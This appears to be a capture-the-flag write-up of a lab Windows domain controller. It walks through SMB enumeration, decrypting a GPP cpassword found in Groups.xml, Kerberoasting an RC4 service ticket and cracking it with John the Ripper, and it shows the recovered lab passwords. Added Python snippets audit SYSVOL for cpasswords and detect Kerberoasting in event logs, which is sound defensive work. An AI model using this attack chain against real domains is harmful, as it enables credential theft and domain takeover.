TL;DR
Pwning a KDC by gaining a foothold with the cpassword credentials found in an old GPO. It was impossible to execute commands, so I crafted packets to get an arcfour (RC4) TGS for the CIFS service account and cracked its password offline. That gave me Administrator access on this KDC. Game over!
nmap -sC -sV -oA nmap/init 10.10.10.100
enum4linux -a 10.10.10.100
# Nmap 7.01 scan initiated Wed Sep 26 21:45:08 2018 as: nmap -sC -sV -oA nmap.init 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.13s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Windows 2003 Kerberos (server time: 2018-09-27 01:45:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003, cpe:/o:microsoft:windows_98
Host script results:
|_smbv2-enabled: Server supports SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 26 21:46:43 2018 -- 1 IP address (1 host up) scanned in 94.85 seconds
Enum4linux shows that the Replication share can be listed anonymously, so by browsing its directories you quickly find a Group Policy Preferences file:
$ smbclient //10.10.10.100/Replication
smb: \> cd active.htb
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> get Registry.pol
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> get Groups\Groups.xml
$ cat Groups\\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>
Note the cpassword attribute in the XML file.
python gpocrack/gpocrack.py 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
Password is: GPPstillStandingStrong2k18
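As an added defensive check (my code, not the post's tooling and not part of gpocrack), the Python below audits a copy of SYSVOL for GPP items that still carry a cpassword attribute and reports the GPO, item type and target account so the offending preference can be removed. It embeds a constructed Groups.xml in the layout shown above with the real value replaced by a placeholder, and assumes the standard Policies/<GUID>/.../Preferences/ path layout.

```python
import os
import re
import xml.etree.ElementTree as ET

GPO_GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")  # varies per GPP item type
# Constructed sample: the Groups.xml layout from the post, cpassword replaced by a placeholder.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2"
      changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="PLACEHOLDER_CPASSWORD"
            changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
            userName="active.htb\\SVC_TGS"/>
</User>
</Groups>
"""

def find_cpasswords(xml_text, path="<inline>"):
    """One finding per GPP item (User, NTService, Task, Drive, ...) whose Properties has a cpassword."""
    m = GPO_GUID_RE.search(path)                     # GPO GUID comes from the file path
    findings = []
    for item in ET.fromstring(xml_text):
        props = item.find("Properties")
        if props is None or "cpassword" not in props.attrib:
            continue
        account = next((props.attrib[a] for a in ACCOUNT_ATTRS if a in props.attrib),
                       item.attrib.get("name", "?"))
        findings.append({"file": path, "gpo": m.group(0) if m else "?", "type": item.tag,
                         "account": account, "changed": item.attrib.get("changed", "")})
    return findings

def audit_sysvol(root_dir):
    """Walk a SYSVOL copy (e.g. a mounted share) and collect findings from every XML file that parses."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith(".xml"):
                full = os.path.join(dirpath, name)
                try:
                    with open(full, encoding="utf-8-sig") as fh:   # GPP files often carry a BOM
                        findings.extend(find_cpasswords(fh.read(), full))
                except ET.ParseError:
                    pass                                           # not a GPP file, skip it
    return findings

if __name__ == "__main__":
    sample_path = "Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml"
    for f in find_cpasswords(SAMPLE_GROUPS_XML, sample_path):
        print(f"{f['gpo']} {f['type']} {f['account']} (changed {f['changed']}) in {f['file']}")
```

Point audit_sysvol at a mounted SYSVOL share to sweep a whole domain; any hit is a credential that every domain user can read.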
Well, so far that’s all I have!
smbclient //10.10.10.100/Users -U=SVC_TGS%GPPstillStandingStrong2k18
smb: \SVC_TGS\Desktop\> get user.txt
This box was not trivial. You couldn't simply execute commands with CME. In addition, the new access to the SMB shares with the credentials found was a rabbit hole.
crackmapexec 10.10.10.100 -u SVC_TGS -p "GPPstillStandingStrong2k18" --shares
CME 10.10.10.100:445 DC [*] Windows 6.1 Build 7601 (name:DC) (domain:ACTIVE)
CME 10.10.10.100:445 DC [+] ACTIVE\SVC_TGS:GPPstillStandingStrong2k18
CME 10.10.10.100:445 DC [+] Enumerating shares
CME 10.10.10.100:445 DC SHARE Permissions
CME 10.10.10.100:445 DC ----- -----------
CME 10.10.10.100:445 DC ADMIN$ NO ACCESS
CME 10.10.10.100:445 DC IPC$ NO ACCESS
CME 10.10.10.100:445 DC SYSVOL READ
CME 10.10.10.100:445 DC C$ NO ACCESS
CME 10.10.10.100:445 DC Replication READ
CME 10.10.10.100:445 DC NETLOGON READ
CME 10.10.10.100:445 DC Users READ
smbspider.py -u SVC_TGS -p GPPstillStandingStrong2k18 -h 10.10.10.100 -s Users
SMB Spider v2.4, Alton Johnson (alton.jx@gmail.com)
[*] Spidering 1 system(s)...
-----
Completed in: 46.9s
With the SVC_TGS service account's credentials, it's possible to ask Kerberos for more: request a legitimate TGT and find out which service(s) this account can use. Although it's not possible to execute commands as SVC_TGS with CME or Mimikatz, it is possible to craft the packets with Impacket, much like running ps> klist on the machine itself would, for example. This gives the service principal name(s) (SPNs) to which the SVC_TGS account has access.
Then, with an SPN and a TGT, sending a TGS-REQ to Kerberos becomes possible. The great thing about a TGS is that it lets you crack the service account's password offline. Yeah! ;)
Here we see that before requesting the TGS for a particular SPN, Impacket makes an Authentication Server Request (AS-REQ) and the server responds with the TGT for the SVC_TGS service account. Note that the TGT (issued for krbtgt) does not use the same encryption type as the TGS that follows.
Then Impacket makes a TGS-REQ that includes the TGT.
Finally, the server responds with a TGS and Impacket formats it as a krb5tgs hash, which is recognized by JTR and Hashcat:
$krb5tgs$<ENCRYPTION_TYPE>$*<USERNAME>$<REALM>$<SPN>*$<FIRST_16_BYTES_TICKET>$<REMAINING_TICKET_BYTES>
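For the detection side of the exchange just described, here is an added example (my code, not Impacket's or the post's) that runs over constructed Security-log 4769 records: it flags successful RC4 (etype 0x17) service-ticket requests for user-owned SPNs and raises an alert when one requester collects them for several services within a short window. The JSON field names are simplified stand-ins for TargetUserName, IpAddress, ServiceName, TicketEncryptionType and Status, and the hosts and times are invented.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for arcfour-hmac (etype 23), the crackable kind

# Constructed sample of 4769 (TGS request) events as JSON lines, the way a SIEM might
# export them. Field names are simplified; accounts follow the post, hosts/times are invented.
SAMPLE_EVENTS = """
{"time":"2018-10-20T18:40:01","id":4769,"account":"SVC_TGS@ACTIVE.HTB","ip":"10.10.14.5","service":"krbtgt","etype":"0x12","status":"0x0"}
{"time":"2018-10-20T18:40:02","id":4769,"account":"SVC_TGS@ACTIVE.HTB","ip":"10.10.14.5","service":"Administrator","etype":"0x17","status":"0x0"}
{"time":"2018-10-20T18:40:02","id":4769,"account":"SVC_TGS@ACTIVE.HTB","ip":"10.10.14.5","service":"DC$","etype":"0x12","status":"0x0"}
{"time":"2018-10-20T18:41:30","id":4769,"account":"jdoe@ACTIVE.HTB","ip":"10.10.10.20","service":"DC$","etype":"0x12","status":"0x0"}
{"time":"2018-10-20T18:42:00","id":4769,"account":"SVC_TGS@ACTIVE.HTB","ip":"10.10.14.5","service":"sqlsvc","etype":"0x17","status":"0x0"}
"""

def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def is_roast_candidate(ev):
    """Successful TGS, RC4 etype, for an SPN owned by a user account (not a machine
    account, not krbtgt): exactly what an offline-crackable service ticket looks like."""
    svc = ev["service"]
    return (ev["id"] == 4769 and ev["status"] == "0x0"
            and ev["etype"].lower() == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def detect_kerberoast(events, window=timedelta(minutes=5), threshold=1):
    """Group candidates per (requester, source IP); alert when one requester collected RC4
    tickets for >= threshold distinct services inside window. threshold=1 suits AES-only domains."""
    per_src = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            per_src[(ev["account"], ev["ip"])].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = []
    for (account, ip), reqs in per_src.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):       # slide the window from each request
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= threshold:
                alerts.append({"account": account, "ip": ip, "first": t0.isoformat(),
                               "services": sorted(services)})
                break
    return alerts

if __name__ == "__main__":
    for a in detect_kerberoast(parse_events(SAMPLE_EVENTS), threshold=2):
        print(f"[!] {a['account']} from {a['ip']} pulled RC4 TGS for {a['services']} at {a['first']}")
```

The same rule is what you would express in a SIEM query; the mitigation it points at is moving service accounts to AES-only and long, random passwords so an RC4 ticket is never issued in the first place.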
With a TGS, we can recover the service account's password. If you run Kali, you will need to follow these steps for JTR to recognize the format.
git clone https://github.com/magnumripper/JohnTheRipper.git && cd JohnTheRipper/src
./configure
make <foo> # <-- use the make command printed at the end of ./configure above
cd ../run
./john --test
And then, voilà :)
$ ./john --wordlist=/usr/share/wordlists/rockyou.txt tgs.txt # DON'T use --format=krb5tgs
./john --wordlist=rockyou.txt ~/documents/CTFs/OSCP/HTB/10.10.10.100/CIFS.krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 59.23% (ETA: 18:42:03) 0g/s 1421Kp/s 1421Kc/s 1421KC/s donmegaa..donisayangalia
Ticketmaster1968 (?)
1g 0:00:00:07 DONE (2018-10-20 18:42) 0.1342g/s 1414Kp/s 1414Kc/s 1414KC/s Tiffani143..Thrall
Use the "--show" option to display all of the cracked passwords reliably
Session completed
./john --wordlist=~/rockyou.txt ~/documents/CTFs/OSCP/HTB/10.10.10.100/CIFS.krb5tgs
$ ./git/tools/JohnTheRipper/run/john --show ./documents/CTFs/OSCP/HTB/10.10.10.100/CIFS.krb5tgs
?:Ticketmaster1968
1 password hash cracked, 0 left